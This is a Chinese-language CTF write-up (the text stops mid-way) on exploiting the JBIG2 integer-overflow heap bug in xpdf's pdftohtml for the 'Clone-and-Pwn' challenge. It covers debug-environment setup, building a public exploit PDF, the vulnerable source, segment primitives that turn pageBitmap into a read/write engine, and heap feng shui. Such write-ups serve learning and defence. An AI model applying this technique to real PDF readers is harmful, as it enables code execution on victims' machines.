The container image is also available on Docker Hub.
[1] Yeah, turns out propagating bug fixes between different Clone-and-Own codebases takes time :)
socat -t90 stdio tcp-connect:47.242.147.191:31337
attachment

Clone-and-Pwn, difficulty:hard

这题是 clone-and-pwn，源码没有做任何改变，就是通过查看最近提交的漏洞修复记录来发掘并利用漏洞。

二、环境搭建

1. 本地环境搭建

这一题是在 debian 下编译的，因此对于 debian 系统来说，有些系统可以直接跑 exp（例如我的 XD）。

wget https://dl.xpdfreader.com/xpdf-4.03.tar.gz
tar -zxvf xpdf-4.03.tar.gz
cd xpdf-4.03
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0" ..
make -j `nproc`

# 题目还给了一个 `GNU C Library (Debian GLIBC 2.33-2) release` 的 glibc 附件
patchelf --replace-needed libc.so.6 ${PWD}/../../libc.so.6 ./xpdf/pdftohtml

启动方式：

1	xpdf/pdftohtml --

2. exploit 调试环境搭建

去题目环境这里下载 dockerfile 等题目环境，之后给 dockerfile 打 patch：

--- a/Dockerfile
+++ b/Dockerfile
@@ -8,7 +8,7 @@ RUN cd /tmp/xpdf-4.03 && \
     mkdir build && \
     cd build && \
     cmake -DCMAKE_BUILD_TYPE=Release \
-        -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro" .. && \
+        -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0 " .. && \
     make -j$(nproc)

 FROM debian:unstable-20211220-slim
@@ -20,6 +20,7 @@ RUN echo "deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/2
     apt-get install -y fonts-arkpandora fonts-noto fonts-dejavu fonts-font-awesome fonts-lato fonts-powerline gsfonts && \
     apt-get clean && rm -rf /var/lib/apt/lists/*
 COPY --from=build /tmp/xpdf-4.03/build/xpdf/pdftohtml /usr/local/bin/
+COPY gdbserver /usr/bin/gdbserver
 RUN mkdir -p /run/secrets && echo 'rwctf{flag placeholder}' > /run/secrets/flag

-ENTRYPOINT [ "/bin/sh", "-c", "/usr/local/bin/pdftohtml \"$@\"", "--" ]
\ No newline at end of file
+ENTRYPOINT [ "/bin/sh"]
\ No newline at end of file

修改目的主要是把 gdbserver 放进镜像里，以及让入口点停在 /bin/sh，而不直接启动 pdftohtml。

这里要注意 COPY 命令的源路径，这里是直接使用相对路径。

执行 build.sh，执行完成后可以检查一下镜像

1
2
3

➜  chall git:(master) docker image ls
REPOSITORY             TAG                      IMAGE ID       CREATED             SIZE
hsogroupie/pdftohtml   latest                   042e72a0f133   45 minutes ago      946MB

启动 docker 镜像

1	docker run -itd -p 1234:1234 -v sakura_volume:/tmp/chall --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --name hsogroupie hsogroupie/pdftohtml

该命令非常长，解构如下：

docker run --help

-i : 进入交互模式
-t : 分配一个伪shell
-d : 在后台以守护模式运行容器
-p : 宿主机端口:容器端口，将容器端口映射到宿主机端口，这里都指定1234就好了
-v : 挂载数据卷
--cap-add=SYS_PTRACE --security-opt seccomp=unconfined : Docker默认禁用PTRACE功能，需要指定这个命令
--name : 给容器声明一个名字

这里挂载数据卷需要额外说明（参考这篇文章）

docker volume create sakura_volume // 创建一个自定义容器卷
docker volume ls // 查看所有容器卷
docker volume inspect sakura_volume // 查看指定容器卷详情信息
...
[
    {
        "CreatedAt": "2022-02-02T01:29:55+08:00",
        "Driver": "local",
        "Labels": {},
        "Mountpoint": "/var/lib/docker/volumes/sakura_volume/_data",
        "Name": "sakura_volume",
        "Options": {},
        "Scope": "local"
    }
]

然后我们对 /var/lib/docker/volumes/sakura_volume/_data 的修改就会映射到容器的 /tmp/chall 里，传输文件就比较方便。

启动完了之后我们可以 docker ps 一下看看有没有问题

1
2
3

➜  chall git:(master) docker ps -a
CONTAINER ID   IMAGE                  COMMAND     CREATED          STATUS          PORTS                                       NAMES
15f265c337c0   hsogroupie/pdftohtml   "/bin/sh"   34 minutes ago   Up 34 minutes   0.0.0.0:1234->1234/tcp, :::1234->1234/tcp   hsogroupie

生成 exp pdf，注意要对 submodule 初始化，不然没有 jbig2enc 库

git clone https://github.com/Riatre/hso-groupie.git
cd hso-groupie/exploit
git submodule update --init
cd ..
sudo cp -r exploit /var/lib/docker/volumes/sakura_volume/_data

然后我们进入 docker 容器里对应数据卷的 exploit 目录下，应该要 install 这些安装包，要是少了就自己补一下：

apt-get update
apt-get install make g++ python3 pybind11-dev python3-dev python2 python2-dev
make
...
...
root@15f265c337c0:/tmp/chall/exploit# make
g++ -O3 -std=c++20 -shared -fPIC jbig2arith.cc jbig2arith.h jbjbarith.cc jbjbarith.h -ojbjbarith.cpython-39-x86_64-linux-gnu.so -I/usr/include/python3.9 -I/usr/include/python3.9
python3 sploit.py
python2 pdf.py sploit > sploit.pdf

调试 exp

1	docker exec -it 15f265c337c0 bash

进入容器的 bash 环境，然后启动 gdbserver

1	rm -rf output && /usr/bin/gdbserver :1234 /usr/local/bin/pdftohtml /tmp/chall/exploit/sploit.pdf output

这里的 output 是随便给一个文件夹名就行了，这是 pdftohtml 必须的启动参数，它会创建这个文件夹，并输出一个结果到这个文件夹里，并且它不能是已经存在的文件夹，而 sploit.pdf 就是我们生成出来的 exp pdf 文件。

然后在宿主机也启动 gdb，然后 target remote:1234，然后随便下个断点看看效果，注意因为 docker 里的源码路径和我宿主机的源码路径并不一致，所以要用 substitute-path 做个转换，建议写个 gdb 脚本完成这个事情，后面就不用一直自己敲了。

target remote :1234
set substitute-path  /tmp/xpdf-4.03/xpdf /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf
b findSegment
c
...
...
 ► 0x555555675179    mov    r8, qword ptr [rax]
   0x55555567517c    cmp    dword ptr [r8 + 8], esi
   0x555555675180    jne    0x555555675170                <0x555555675170>
    ↓
   0x555555675170    add    rax, 8
   0x555555675174    cmp    rax, rdx
   0x555555675177    je     0x555555675190                <0x555555675190>
───────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────
In file: /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf/JBIG2Stream.cc
   4036 JBIG2Segment *JBIG2Stream::findSegment(Guint segNum) {
   4037   JBIG2Segment *seg;
   4038   int i;
   4039
   4040   for (i = 0; i < globalSegments->getLength(); ++i) {
 ► 4041     seg = (JBIG2Segment *)globalSegments->get(i);
   4042     if (seg->getSegNum() == segNum) {
   4043       return seg;
   4044     }
   4045   }
   4046   for (i = 0; i < segments->getLength(); ++i) {
───────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdd28 —▸ 0x555555676c72 ◂— mov    r12, rax
01:0008│     0x7fffffffdd30 ◂— 0x0
02:0010│     0x7fffffffdd38 ◂— 0x0
03:0018│     0x7fffffffdd40 —▸ 0x555561ec0f00 ◂— 0x200000001
04:0020│     0x7fffffffdd48 —▸ 0x555561f40c64 ◂— 0x203a100000000
05:0028│     0x7fffffffdd50 ◂— 0x0
... ↓        2 skipped
─────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
 ► f 0   0x555555675179
   f 1   0x555555676c72
   f 2   0x555555679198 JBIG2Stream::readSegments()+1032
   f 3   0x555555679473 JBIG2Stream::reset()+211
   f 4   0x55555560139a
   f 5   0x5555556494a9
   f 6   0x55555564aba0
   f 7   0x55555563c9e5

现在我们就完成了整个调试环境的搭建。

三、漏洞点

这题预期的解法是使用这篇 google project zero 的 iMessage exploit 中的漏洞。漏洞点位于 JBIG2Stream：

void JBIG2Stream::readTextRegionSeg(Guint segNum, GBool imm,
                    GBool lossless, Guint length,
                    Guint *refSegs, Guint nRefSegs) {
  ...
  Guint numSyms;
  ...
  // get symbol dictionaries and tables
  codeTables = new GList();
  // 1. 初始时为 0
  numSyms = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        // 2. 该变量与一个用户可控的值相加，会造成整数溢出
        numSyms += ((JBIG2SymbolDict *)seg)->getSize();
      } else if (seg->getType() == jbig2SegCodeTable) {
        codeTables->append(seg);
      }
    } else {
      ...
    }
  }
  ...
  // get the symbol bitmaps
  // 3. 整数溢出后，这里分配了一个较小的堆内存（指针数组）
  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *));
  kk = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        symbolDict = (JBIG2SymbolDict *)seg;
        // 4. 将各个指针写入该堆内存，触发堆溢出
        for (k = 0; k < symbolDict->getSize(); ++k) {
          syms[kk++] = symbolDict->getBitmap(k);
        }
      }
    }
  }
  ...
}

由于恶意构造的 refSegs 中，一些 seg->getSize() 值很大（4GB），因此如果全部写进则肯定会触发 crash。所以在实际的漏洞利用中，会尝试先做做堆风水：

看图，exploit 需要将 segments GList 的后备存储，放置在刚刚创建的溢出堆块的高地址处。这样触发堆溢出时，就能在执行前几个正常 size 的写入操作时，将后备存储中的那个超大 size 所对应的 segment 指针，替换成非 JBIG2SymbolDict 类型的 segment 指针（即 JBIG2Bitmap 类型）。之后当程序检索这个 segment 指针时，就会跳过该指针的检索。

四、漏洞利用前置知识

1. JBIG2Decode

漏洞点位于 JBIG2Stream ，而 JBIG2Stream 又怎么存在于 pdf 中呢？

pdf 文件结构本质上是一个树状图，这里给出一个使用 JBIG2Stream 的 pdf 片段：

4 0 obj
<< /Filter /FlateDecode
/Length 3988
>>
stream
/* [MyStream1] */
endstream
endobj

5 0 obj
<< /DecodeParms  << /JBIG2Globals 4 0 R >>
/Width 1024
/ColorSpace /DeviceGray
/Height 1
/Filter /JBIG2Decode
/Subtype /Image
/Length 418248
/Type /XObject
/BitsPerComponent 1
>>
stream
/* [MyStream2] */
endstream
endobj

pdf 文件中，4 0 obj、5 0 obj 都是表示一个特定的 pdf object。

其中，4 0 obj 标识了下面中的 MyStream1，其参数 /Filter /FlateDecode 表示该流是使用 zlib 压缩。

继续往下看可以看到： 5 0 obj 中，/DecodeParms 引用了 4 0 obj 中的 stream 流，即 MyStream1；同时参数 /Filter /JBIG2Decode 指定了接下来的流 MyStream2 使用的解码方式是 JBIG2Decode。

因此从上文可以得知，MyStream2 使用 JBIG2Decode 进行解码，其解码参数为上面引用的这个 4 0 obj，即 MyStream1 使用 FlateDecode 所解码后的流，而该参数的键为 JBIG2Globals。

而我们要做的，就是精心构建 MyStream1 和 MyStream2（这两个流都是 JBIG2Stream），使其在解析这两个 Stream 时能触发漏洞，从而 get shell。

构建好这两个流后，可以使用 jbig2enc/pdf.py 来创建出 pdf。

2. Segments 小叙

注，这一节中，每个 segment 所对应的代码最好亲自阅读一下。

当 xpdf 对 JBIG2Stream 解码时，正如上节中所示，JBIG2Decode 需要一个参数 JBIG2Globals。因此在解析时，会先解析 JBIG2Globals 的 stream，之后再解析下面的 main stream。以下代码说明了 stream 的解析过程：

void JBIG2Stream::reset()
{
    GList *t;

    segments = new GList();
    globalSegments = new GList();

    // read the globals stream
    if (globalsStream.isStream())
    {
        // 解析以 DecodeParms 传来的 global stream 流，即 FlateDecode(MyStream1)
        curStr = globalsStream.getStream();
        curStr->reset();
        // 解析时需要使用到解码器，这里是对解码器进行初始化
        arithDecoder->setStream(curStr);
        huffDecoder->setStream(curStr);
        mmrDecoder->setStream(curStr);
        // 开始读取 segments
        readSegments();
        curStr->close();
        // swap the newly read segments list into globalSegments
        t = segments;
        segments = globalSegments;
        globalSegments = t;
    }

    // read the main stream
    // 解析 main stream, 即 MySteram2
    curStr = str;
    curStr->reset();
    // 同样对解码器进行初始化
    arithDecoder->setStream(curStr);
    huffDecoder->setStream(curStr);
    mmrDecoder->setStream(curStr);
    readSegments();

    if (pageBitmap)
    {
        dataPtr = pageBitmap->getDataPtr();
        dataEnd = dataPtr + pageBitmap->getDataSize();
    }
    else
    {
        dataPtr = dataEnd = NULL;
    }
}

这里我们可以了解到，JBIG2Stream 是由多个 Segment 组成的，Segment 种类较多。这里我们只关注几个有用到的 Segment。

a. EOFSeg

该 Segment 的解析标志了完成了全部 segment 的读取，没有其他用途。

b. SymbolDictSeg

SymbolDict 主要存放了一个指向 Bitmap 的指针数组。Bitmap 可以用于存放数据，在实际漏洞利用中将起到类似内存的作用。

对于每个 symbol dict 中的 Bitmap，规范中将其称为一个 instance。

解析 SymbolDictSeg 时，将会从 stream 中读取并创建出每一个 Bitmap。

GBool JBIG2Stream::readSymbolDictSeg(Guint segNum, Guint length,
                                     Guint *refSegs, Guint nRefSegs)
{
    [...]
    // 创建 bitmaps 数组
    // get the input symbol bitmaps
    bitmaps = (JBIG2Bitmap **)gmallocn(numInputSyms + numNewSyms,
                                       sizeof(JBIG2Bitmap *));
    for (i = 0; i < numInputSyms + numNewSyms; ++i)
    {
        bitmaps[i] = NULL;
    }
    k = 0;
    inputSymbolDict = NULL;
    for (i = 0; i < nRefSegs; ++i)
    {
        if ((seg = findSegment(refSegs[i])))
        {
            if (seg->getType() == jbig2SegSymbolDict)
            {
                inputSymbolDict = (JBIG2SymbolDict *)seg;
                for (j = 0; j < inputSymbolDict->getSize(); ++j)
                {
                    bitmaps[k++] = inputSymbolDict->getBitmap(j);
                }
            }
        }
    }
    [...]
    // 开始尝试从外部 JBIG2Stream 流中读取 bitmap
    symHeight = 0;
    i = 0;
    while (i < numNewSyms)
    {
        // read the height class delta height
        if (huff) [...]
        else
        {
            arithDecoder->decodeInt(&dh, iadhStats);
        }
        [...]
        symHeight += dh;
        symWidth = 0;
        totalWidth = 0;
        j = i;

        [...]

        // read the symbols in this height class
        while (1)
        {
            // read the delta width
            if (huff) [...]
            else
            {
                if (!arithDecoder->decodeInt(&dw, iadwStats))
                {
                    break;
                }
            }
            [...]

            // using a collective bitmap, so don't read a bitmap here
            if (huff && !refAgg) [...]
            else if (refAgg) [...]
            else
            {
                // 从外部流中读取 bitmap 并将其保存进数组中
                bitmaps[numInputSyms + i] =
                    readGenericBitmap(gFalse, symWidth, symHeight,
                                    sdTemplate, gFalse, gFalse, NULL,
                                    sdATX, sdATY, 0);
            }

            ++i;
        }

        // read the collective bitmap
        if (huff && !refAgg) [...]
    }
    // 创建了一个 symbolDict 结构体
    // create the symbol dict object
    symbolDict = new JBIG2SymbolDict(segNum, numExSyms);

    // 将上面创建的 bitmaps 数组复制进 symbolDict 结构体中
    // exported symbol list
    i = j = 0;
    ex = gFalse;
    prevRun = 1;
    while (i < numInputSyms + numNewSyms)
    {
        if (huff)
            [...]
        else
        {
            arithDecoder->decodeInt(&run, iaexStats);
        }
        [...]
        if (ex)
        {
            for (cnt = 0; cnt < run; ++cnt)
            {
                // 将上面创建的 bitmaps 对等深拷贝进 symbolDict 中
                symbolDict->setBitmap(j++, bitmaps[i++]->copy());
            }
        }
        else
        {
            i += run;
        }
        ex = !ex;
        prevRun = run;
    }
    [...] // 释放 bitmaps 数组
    // store the new symbol dict
    segments->append(symbolDict);
    [...]
}

c. PageInfoSeg

对于每个 Page 来说，需要有一个 Bitmap 来表示当前页面渲染的数据。而在解析 PageInfoSeg 时，程序会创建一个流内全局 Bitmap：pageBitmap。

void JBIG2Stream::readPageInfoSeg(Guint length)
{
    Guint xRes, yRes, flags, striping;

    if (!readULong(&pageW) || !readULong(&pageH) ||
        !readULong(&xRes) || !readULong(&yRes) ||
        !readUByte(&flags) || !readUWord(&striping))
    {
        goto eofError;
    }
    [...]
    // 创建流内全局字段 pageBitmap
    pageBitmap = new JBIG2Bitmap(0, pageW, curPageH);

    // default pixel value
    [...]

    return;

eofError:
    error(errSyntaxError, getPos(), "Unexpected EOF in JBIG2 stream");
}

需要注意的是，pageBitmap 很关键，它表示了一个 Page 的 bitmap。我们将使用堆溢出来覆写 pageBitmap 的 Width 和 Height，进而达到越界读写的目的。

同时 PageInfoSeg 还可用于绕过一个 sanity check，下文中会提到。

d. GenericRegionSeg

GenericRegionSeg 的解析将会从流中读取一个 Bitmap，并与当前的 pageBitmap 的特定区域进行运算：

需要注意的是，JBIG2Globals Stream 中的 Segment 不允许引用任何 Segment，因此 GenericRegionSeg 不能存放在 JBIG2Globals 流中。

void JBIG2Stream::readGenericRegionSeg(Guint segNum, GBool imm,
                                       GBool lossless, Guint length)
{
    [...]
    // read the bitmap
    bitmap = readGenericBitmap(mmr, w, h, templ, tpgdOn, gFalse,
                               NULL, atx, aty, mmr ? length - 18 : 0);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    [...]
}

其中，从流中读取 Bitmap 的操作位于 readGenericBitmap 函数中，读取的操作需要使用到编码器。

而与 pageBitmap 的运算主要是使用 JBIG2Bitmap::combine 方法，该方法中有五种运算方式，分别是 与、或、异或和替换：

switch (combOp)
{
    case 0: // or
        dest |= src1 & m2;
        break;
    case 1: // and
        dest &= src1 | m1;
        break;
    case 2: // xor
        dest ^= src1 & m2;
        break;
    case 3: // xnor
        dest ^= (src1 ^ 0xff) & m2;
        break;
    case 4: // replace
        dest = (src1 & m2) | (dest & m1);
        break;
}

我们可以将外部的立即数，通过利用该段的解析过程，将其传入 pageBitmap 中等待进一步的运算。

e. GenericRefinementRegionSeg

GenericRefinementRegionSeg 的解析过程，组合起来可以对 pageBitmap 上的部分数据进行位运算。我们可以利用这里的位运算来构建加法器：

void JBIG2Stream::readGenericRefinementRegionSeg(Guint segNum, GBool imm,
                                                 GBool lossless, Guint length,
                                                 Guint *refSegs,
                                                 Guint nRefSegs)
{
    [...]
    if (nRefSegs == 1)
    {
        if (!(seg = findSegment(refSegs[0])) ||
            seg->getType() != jbig2SegBitmap)
        {
            error(errSyntaxError, getPos(),
                  "Bad bitmap reference in JBIG2 generic refinement segment");
            return;
        }
        refBitmap = (JBIG2Bitmap *)seg;
    }
    else
    {
        refBitmap = pageBitmap->getSlice(x, y, w, h);
    }
    [...]
    // read
    bitmap = readGenericRefinementRegion(w, h, templ, tpgrOn,
                                         refBitmap, 0, 0, atx, aty);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    else
    {
        bitmap->setSegNum(segNum);
        segments->append(bitmap);
    }
    [...]
}

当 GenericRefinementRegionSeg 不引用任何段时，变量 nRefSegs 为 0，此时 refBitmap 为 pageBitmap 上指定 x、y、w、h 属性的一块数据空间。
由于函数 readGenericRefinementRegion 只会受到 refBitmap 的影响，因此我们可以认定传出的bitmap 变量等价于 pageBitmap 上特定区域的数据。
接下来，若我们指定 imm 为 false，那么这块等价于 pageBitmap 上特定区域的数据，将被存储进 segments 数组中。
若下一次解析 GenericRefinementRegionSeg 时引用了第一步创建的段，那么此时 refBitmap 为第一步创建的 Bitmap。这样当 imm 为 true 时，第一步创建的 Bitmap 将会和 pageBitmap 上指定的位置进行 combine 操作，即位运算。
由于第一步创建的 bitmap 是和 pageBitmap 相关，因此整个过程就等价于
- 从 pageBitmap 上特定位置1取下一块数据，并保存至 segments 上
- 从 segments 上取下这块数据，并将其与 pageBitmap 上特定位置2进行位运算。
  1
  2
  3
  4
  5
  6
  7
  8
  +----------------------> x-axis
  |
  | .(2)
  |
  | .(1)
  |
  V
  y-axis

如此，便达到了让 pageBitmap 上指定两个位置的数据进行位运算的操作。我们将使用该操作来一步步构建位运算原语、乃至加法器。

f. TextRegionSeg

TextRegionSeg 可以引用指定的 SymbolDictSeg，并对其中的任意 instance 进行操作。

需要注意的是，JBIG2Globals Stream 中的 Segment 不允许引用任何 Segment，因此 TextRegionSeg 不能存放在 JBIG2Globals 流中。

整体流程大致如下：

void JBIG2Stream::readTextRegionSeg(Guint segNum, GBool imm,
                                    GBool lossless, Guint length,
                                    Guint *refSegs, Guint nRefSegs)
{
    [...]
    // get the symbol bitmaps
    // 从所引用的每个段上，将每个 instance 拷贝到 syms 数组中
    syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *));
    kk = 0;
    for (i = 0; i < nRefSegs; ++i)
    {
        if ((seg = findSegment(refSegs[i])))
        {
            if (seg->getType() == jbig2SegSymbolDict)
            {
                symbolDict = (JBIG2SymbolDict *)seg;
                for (k = 0; k < symbolDict->getSize(); ++k)
                {
                    syms[kk++] = symbolDict->getBitmap(k);
                }
            }
        }
    }
    [...]
    // 执行 readTextRegion 函数，将指定的 syms 与新创建出来的 bitmap 进行 combine 操作
    bitmap = readTextRegion(huff, refine, w, h, numInstances,
                            logStrips, numSyms, symCodeTab, symCodeLen, syms,
                            defPixel, combOp, transposed, refCorner, sOffset,
                            huffFSTable, huffDSTable, huffDTTable,
                            huffRDWTable, huffRDHTable,
                            huffRDXTable, huffRDYTable, huffRSizeTable,
                            templ, atx, aty);

    gfree(syms);

    // combine the region bitmap into the page bitmap
    // 将当前 bitmap 与 pageBitmap 进行 combine 操作，传递所引用的 instance 上的值至 pageBitmap 上
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    else
    {
        bitmap->setSegNum(segNum);
        segments->append(bitmap);
    }
    [...]
}

3. JBIG2Encode

a. encode Bitmap

通过阅读上面关于 Segments 的源代码，我们可以很容易的得知：在诸如 readGenericBitmap 等读入 bitmap 的函数中，hso 会尝试从外部 JBIG2Stream 流中，使用某种解码器来对读入的 bitmap 进行解码（例如代码中多次出现 arithDecoder->decodeInt 等调用）。

因此，作为提供外部 JBIG2Stream 流的我们，需要对写入至 pdf 中的 bitmap 做对应的编码操作。

从最上面的 JBIG2Stream::reset 函数中可以得知，一共由三种解码器：

JArithmeticDecoder
JBIG2HuffmanDecoder
JBIG2MMRDecoder

而这些解码器的内部算法，如果要让我们徒手撸一个的话，那么做题效率就会非常低。因此，我们可以使用 jbig2enc 库来帮助我们完成数据编码操作，该库已经实现了 JArithmeticDecoder 状态机的编码算法，故我们无需了解内部细节即可完成对 bitmap 的编码过程。

1	git clone git@github.com:agl/jbig2enc.git

但是，该库是使用 C++ 编写的，若 exploit 也全部使用 C++ 完成，则工作量较高。因此，我们可以使用 pybind11 来暴露 jbig2enc 中的部分接口给 python，这样编写 exploit 时可以使用 python 语言来完成。

1	sudo apt-get install pybind11-dev

最后需要注意的是，由于 jbig2enc 的接口会使用到大量的指针，而将指针暴露给 python 接口调用是一个非常不明智的选择（因为如果让 python 来调用需要指针的接口，则会降低开发速度和提高触发 bug 的几率），因此我们最好根据当前的需求，即：

将 bitmap 数据以 JArithmeticDecoder 方式来进行编码。

来额外编写一个 wrapper C++ 代码，实现三个封装好的结构体/枚举：

ArithEncoder：调用 jbig2enc 对 bitmap 进行编码的类
Bitmap：待被编码的 bitmap 数据
ArithEncoder::Proc：ArithEncoder 编码器的状态枚举

最后将这三个结构体/枚举暴露给 python 调用，避免让 python 直接操作指针。

这一小节所实现的代码，正对应于 exp 中的以下几个文件：
hso-groupie/exploit/jbig2arith.[cc,h]
hso-groupie/exploit/jbjbarith.[cc,h]

b. encode segments

hso 在 read segments 时，首先会读取出每个当前 segment 的段号 segNum、segFlags、refFlags 等一系列字段和标志，之后才是进行（可能的） bitmap 读取。

这些字段和标志同样是需要我们手动放进 JBIG2Stream 中。由于这里的字段和标志不需要使用解码器进行解码，因此可以手动编写代码将字段一个个放置进流中。

这一步的操作位于 exp 中的 hso-groupie/exploit/jbig2.py ，该脚本为所有用到的 segment 都编写了一个对应的 python 结构转 JBIG2Stream 字节流的操作；同时，上一节中暴露给 python 所调用的 bitmap encoder 接口，也是在该脚本中所使用。

这样，当我们使用 python 设计好一个个特定的 segments 后，我们便可以将这些 segments 快速转换成 JBIG2Stream 流数据，方便快捷。

五、漏洞利用流程

1. 堆风水

a. 创建堆空洞

先放上这张镇楼图：

为了利用这个堆溢出漏洞，我们需要充分发动堆风水，将指定的结构放至对应的堆块。这里，我们的堆风水需要完成以下几个目标：

让 pdf 在解析 TextRegionSeg 时，其创建的 syms 指针数组位于 undersized syms buffer 处
让内含存放超多指针的 JBIG2SymbolDict 结构体的 segment 放置在 segments GList backing buffer 处
这里，我们打算让 JBIG2SymbolDict 结构体存放至 global segment 中，因为 SymbolDictSegment 不依赖与任何的 Segments，但是后续的 TextRegionSegment 会依赖这些 SymbolDictSegment。
让 pageBitmap 结构体占据图中 JBIG2Bitmap 那块内存，并让其 data 占据图中上面 bitmap backing buffer 那块内存。
通读代码，我们可以得知绝大多数 segments 在解析时，都可以让其 bitmap 与 pageBitmap 进行运算，并将结果保存在 pageBitmap 上。因此让 pageBitmap 拥有越界读写的能力是最好的选择。

我们先尝试在 global segment 中分配三个不同 Bitmap 大小的 SymbolDict 出来。这里分配不同大小的 SymbolDict 是为了后续在 TextRegionSeg 中，排列组合 size 至溢出，因此这三个堆块的位置不需要关心：

# global segment
global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
]

其中 size_to_overflow 为上图中 overflow 的字节数，具体计算过程稍后介绍。

此时我们看看分配完这三个 SymbolDict 后的 bins 是什么情况，可以看到有大量的碎片堆块：

pwndbg> bins
tcachebins
0x20 [  4]: 0x55555579f8e0 —▸ 0x5555557b9550 —▸ 0x5555557b0c10 —▸ 0x5555557b0c60 ◂— 0x0
0x30 [  5]: 0x5555557ab330 —▸ 0x5555557b0c30 —▸ 0x5555557b0c80 —▸ 0x555555799280 —▸ 0x5555557992d0 ◂— 0x0
0x40 [  7]: 0x5555557f7f90 —▸ 0x5555557f8f10 —▸ 0x5555557f9100 —▸ 0x5555557f7bb0 —▸ 0x5555557fe710 —▸ 0x5555557a0320 —▸ 0x555555797210 ◂— 0x0
0x50 [  1]: 0x5555557a02b0 ◂— 0x0
0x60 [  4]: 0x5555557ab3c0 —▸ 0x5555557a9e40 —▸ 0x5555557ab890 —▸ 0x5555557ab790 ◂— 0x0
0x70 [  1]: 0x5555557ac760 ◂— 0x0
0x90 [  1]: 0x5555557b94c0 ◂— 0x0
0xa0 [  3]: 0x555555798e00 —▸ 0x5555557b6930 —▸ 0x5555557b6a10 ◂— 0x0
0xb0 [  2]: 0x5555557ba520 —▸ 0x5555557b9410 ◂— 0x0
0xc0 [  3]: 0x5555557bec00 —▸ 0x5555557bf620 —▸ 0x5555557b1220 ◂— 0x0
0xd0 [  5]: 0x555555799ec0 —▸ 0x5555557b0cb0 —▸ 0x5555557c5400 —▸ 0x5555557c37f0 —▸ 0x5555557bfcf0 ◂— 0x0
0xe0 [  3]: 0x5555557be4b0 —▸ 0x5555557a9a30 —▸ 0x5555557bc750 ◂— 0x0
0xf0 [  3]: 0x5555557c6d30 —▸ 0x5555557bd370 —▸ 0x5555557bd4a0 ◂— 0x0
0x100 [  2]: 0x5555557c4360 —▸ 0x5555557c44a0 ◂— 0x0
0x110 [  1]: 0x555555797100 ◂— 0x0
0x120 [  2]: 0x5555557c1000 —▸ 0x5555557c5880 ◂— 0x0
0x140 [  3]: 0x5555557c7c80 —▸ 0x5555557c7430 —▸ 0x5555557cc180 ◂— 0x0
0x150 [  3]: 0x5555557cdac0 —▸ 0x5555557c83f0 —▸ 0x5555557c8590 ◂— 0x0
0x160 [  2]: 0x55555579fc00 —▸ 0x5555557a4420 ◂— 0x0
0x170 [  3]: 0x555555797c20 —▸ 0x5555557d36c0 —▸ 0x5555557d3550 ◂— 0x0
0x180 [  2]: 0x5555557bff50 —▸ 0x5555557d8010 ◂— 0x0
0x190 [  7]: 0x5555557adb80 —▸ 0x5555557d8530 —▸ 0x5555557ad570 —▸ 0x5555557ac7d0 —▸ 0x5555557a8710 —▸ 0x5555557a8d60 —▸ 0x5555557aad00 ◂— 0x0
0x1a0 [  2]: 0x5555557d2890 —▸ 0x5555557ad700 ◂— 0x0
0x1b0 [  2]: 0x5555557a8ef0 —▸ 0x5555557aea50 ◂— 0x0
0x1c0 [  2]: 0x5555557d1bb0 —▸ 0x55555579ad70 ◂— 0x0
0x1d0 [  2]: 0x555555796b00 —▸ 0x555555796640 ◂— 0x0
0x1f0 [  2]: 0x5555557a6410 —▸ 0x5555557a6220 ◂— 0x0
0x200 [  2]: 0x55555576a670 —▸ 0x5555557aae90 ◂— 0x0
0x220 [  2]: 0x5555557d8310 —▸ 0x5555557ac960 ◂— 0x0
0x230 [  1]: 0x5555557bd980 ◂— 0x0
0x270 [  1]: 0x5555557ba6d0 ◂— 0x0
0x2b0 [  1]: 0x5555557abdc0 ◂— 0x0
0x2c0 [  1]: 0x555555798320 ◂— 0x0
0x2e0 [  1]: 0x5555557aa730 ◂— 0x0
0x300 [  2]: 0x5555557a5c60 —▸ 0x5555557a9590 ◂— 0x0
0x310 [  7]: 0x5555557ae510 —▸ 0x5555557ac110 —▸ 0x5555557ad010 —▸ 0x5555557abab0 —▸ 0x5555557a9280 —▸ 0x5555557aa420 —▸ 0x5555557a76c0 ◂— 0x0
0x320 [  3]: 0x555555799f90 —▸ 0x5555557becc0 —▸ 0x5555557bab30 ◂— 0x0
0x350 [  2]: 0x5555557bcb40 —▸ 0x5555557c3bd0 ◂— 0x0
0x390 [  1]: 0x5555557a88a0 ◂— 0x0
